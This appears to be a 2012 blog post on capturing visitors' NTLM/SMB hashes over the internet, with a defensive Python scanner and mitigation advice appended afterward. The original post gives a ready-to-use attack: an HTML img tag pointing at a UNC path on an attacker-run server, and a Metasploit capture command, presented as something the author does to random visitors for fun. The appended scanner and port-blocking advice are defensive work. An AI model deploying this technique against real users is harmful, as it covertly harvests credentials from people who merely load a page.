Monday, November 12, 2012

Capturing SMB hashes over the internet

I like leaving this enabled on my VPS just for fun sometimes. You can capture people's SMB hashes remotely by referencing a resource with a UNC path. When your browser loads my page, it sees a resource that appears to live on some SMB server somewhere, and IE will automatically send its credentials to it (what gets captured is the NTLM challenge-response for that authentication attempt). IE does this for a "seamless user experience". Well, luckily for us that means a "seamless user pwn".
So on your VPS, modify index.html at the root of your web server to include this:
<img src="\\72.14.182.123\cats.gif" />
and then run as root:
msfcli auxiliary/server/capture/smb JOHNPWFILE='/root/testsmbcapturefile' E
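As an added defensive check (not part of the original post): a small Python scanner that flags HTML resource references a Windows client would try to resolve over SMB, i.e. UNC \\host\share paths and file://host/... URLs like the img tag above. The sample markup it scans is constructed here; the hostnames in it are placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes whose value the browser fetches (href on <link>/<a> included,
# since a UNC link is worth reviewing even if it only fires on click).
FETCH_ATTRS = {"src", "href", "data", "poster", "background"}

# \\host\share\file : host is everything between the leading \\ and the next \
UNC_RE = re.compile(r"^\s*\\\\([^\\]+)\\")


def smb_target(value):
    """Return the host a Windows client would contact over SMB, or None.
    Protocol-relative //host/x URLs are NOT flagged: they go over HTTP(S)."""
    m = UNC_RE.match(value)
    if m:
        return m.group(1)
    u = urlparse(value.strip())
    if u.scheme.lower() == "file" and u.netloc:  # file://host/share/x
        return u.netloc
    return None


class UncReferenceScanner(HTMLParser):
    """Collects (tag, attribute, host, raw value) for every SMB-resolving reference."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):  # also called for self-closing <img .../>
        for name, value in attrs:
            if value and name.lower() in FETCH_ATTRS:
                host = smb_target(value)
                if host:
                    self.findings.append((tag, name, host, value))


def scan_html(markup):
    scanner = UncReferenceScanner()
    scanner.feed(markup)
    return scanner.findings


# Constructed sample page: one UNC image (the post's snippet), one file:// stylesheet,
# and two harmless references that must not be flagged.
SAMPLE_HTML = r"""<html><body>
<img src="\\72.14.182.123\cats.gif" />
<link rel="stylesheet" href="file://fileserver.example/share/site.css">
<img src="https://example.com/cats.gif">
<script src="//cdn.example.com/lib.js"></script>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, host, raw in scan_html(SAMPLE_HTML):
        print(f"<{tag} {attr}> would authenticate to SMB host {host}: {raw}")
```

On the client side the same exposure is closed by blocking outbound TCP 445/139 at the perimeter and by the Windows policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers".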
